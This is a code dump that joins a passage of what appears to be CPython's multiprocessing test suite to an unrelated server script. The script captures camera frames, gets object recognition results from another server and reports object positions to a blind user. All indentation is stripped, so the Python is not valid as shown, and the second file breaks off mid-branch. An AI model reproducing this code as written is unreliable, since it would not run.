args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
Server_Socket.py
|
import socket
import threading
import Server_GUI
import os
import cv2
import numpy as np
from scipy.linalg import solve
import math
import time
import client
TCP_IP = ''
TCP_PORT = 1234
send_msg = ''
camera_port = 0
rec_result = ''
co = 0 # counter of points by mouse when initialize the coordinate
x = 0.000
y = 0.000
'''
●(0,0) ●(32,0)
●(0,32)
'''
px = [0.000] # array to store the input x coordinate when initialize
py = [0.000] # array to store the input y coordinate when initialize
rx = [0.000, 4.000, 0.000] # 初始化的3個點的真實x座標(比例尺)
ry = [0.000, 0.000, 4.000] # 初始化的3個點的真實y座標(比例尺)
t = 0
tx1, ty1, tx2, ty2, sx1, sy1, sx2, sy2 = 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000, 0.000
solx, soly = 0.000, 0.000
before_pos = []
class ReceiveThread(threading.Thread):
def __init__(self, s, count):
threading.Thread.__init__(self)
self.cs = s
self.gui = Server_GUI.GUI()
Server_GUI.iscreate2 = True
if count == 0:
# initialize first position of every thing in the room
vcap = cv2.VideoCapture(camera_port)
self.rret, self.rframe = vcap.read()
cv2.imwrite('init_recog.jpg', self.rframe)
self.cli = client.client_socket()
init = threading.Thread(target=self.cli.create, args = ('init_recog.jpg', True))
init.start()
# initialize the coordinate
cv2.namedWindow('image')
cv2.setMouseCallback('image', self.draw_circle)
self.img = cv2.imread('tmpdemo.jpg')
while(1):
cv2.imshow('image', self.rframe)
# cv2.imshow('image', self.img)
k = cv2.waitKey(1)
if co == 3:
cv2.destroyAllWindows()
break
cv2.imwrite('init_coor.jpg', self.rframe)
init.join()
print('initial object recognition: ', before_pos, '\n')
def run(self):
while True:
self.recv_msg = self.cs.recv(1024)
if not self.recv_msg:
break
else:
if self.validCommand(self.recv_msg.decode('utf-8')) > 0:
if self.validCommand(self.recv_msg.decode('utf-8')) != 3:
self.cs.send('正在進行辨識\n'.encode('utf-8'))
else:
self.cs.send('正在紀錄傢俱位置\n'.encode('utf-8'))
if os.path.isfile('./output.jpg'):
os.system('rm output.jpg')
cap = cv2.VideoCapture(camera_port)
if not cap.isOpened():
cap.open()
# save the 70th frame (for brightness of the image)
frameindex = 0
while True:
ret, frame = cap.read()
# cv2.imshow('frame', frame)
if frameindex == 70:
cv2.imwrite('output.jpg', frame)
break
frameindex += 1
cap.release()
cv2.destroyAllWindows()
# receiving result from workstation server
self.cli = client.client_socket()
rec_result = self.cli.create('output.jpg', False)
result_list = rec_result.split()
# result back to app
if len(result_list) < 3:
self.cs.send('無辨識結果\n'.encode('utf-8'))
else:
if self.validCommand(self.recv_msg.decode('utf-8')) == 1: # 有沒有移動過
if self.isMoved(self.obj, before_pos, result_list) == 1:
self.cs.send('沒有'.encode('utf-8'))
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('的辨識結果\n'.encode('utf-8'))
elif self.isMoved(self.obj, before_pos, result_list) == 2:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('有移動過\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('沒有移動過\n'.encode('utf-8'))
elif self.validCommand(self.recv_msg.decode('utf-8')) == 2: # 在哪裡
for index, rl in enumerate(result_list):
# print(rl, self.obj)
if rl == self.obj:
objdir = self.direction(result_list[index+1], result_list[index+2])
origin = self.four(320, 480) # calculate coordinate of (320,480)
realxy = self.four(int(float(result_list[index+1])), int(float(result_list[index+2])))
objdis = self.distance(realxy[0], realxy[1], origin[0], origin[1])
step = math.ceil(objdis / 4)
# sample:椅子大約在你的左前方五步 並在導盲杖可觸及的範圍內
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('大約在你的'.encode('utf-8'))
self.cs.send(objdir.encode('utf-8'))
self.cs.send(str(step).encode('utf-8'))
self.cs.send('步,並在導盲杖可觸及的範圍內\n'.encode('utf-8'))
break
elif index == len(result_list) - 1:
self.cs.send('沒有'.encode('utf-8'))
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('的辨識結果\n'.encode('utf-8'))
elif self.validCommand(self.recv_msg.decode('utf-8')) == 3: # 紀錄家具位置
self.cs.send('傢俱位置紀錄完畢\n'.encode('utf-8'))
elif self.validCommand(self.recv_msg.decode('utf-8')) == 4: # 我想找XX
print(result_list)
if not 'diningtable' in result_list or not 'person' in result_list:
self.cs.send('沒有桌子的辨識結果或無法定位您的位置\n'.encode('utf-8'))
else:
if not self.obj in result_list:
self.cs.send('沒有'.encode('utf-8'))
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('的辨識結果\n'.encode('utf-8'))
else: # person and table detected
''' (If person is at the other side of the table, change the direction.)
| p | (faceing down)
-----------------
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 5 | 6 | 7 | 8 |
-----------------
'''
table_index = result_list.index('diningtable')
person_index = result_list.index('person')
obj_index = result_list.index(self.obj)
table_x = int(float(result_list[table_index + 1]))
table_y = int(float(result_list[table_index + 2]))
person_y = int(float(result_list[person_index + 2]))
obj_x = int(float(result_list[obj_index + 1]))
obj_y = int(float(result_list[obj_index +2]))
w = int(float(result_list[table_index + 3]))
h = int(float(result_list[table_index + 4]))
if table_y >= person_y: # person is in back of the table (facing the camera)
if obj_y >= table_y - h and obj_y <= table_y - h/2 and obj_x >= table_x - w and obj_x <= table_x + w:
# object is between person and up half of the table on the image
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# object is at position 4
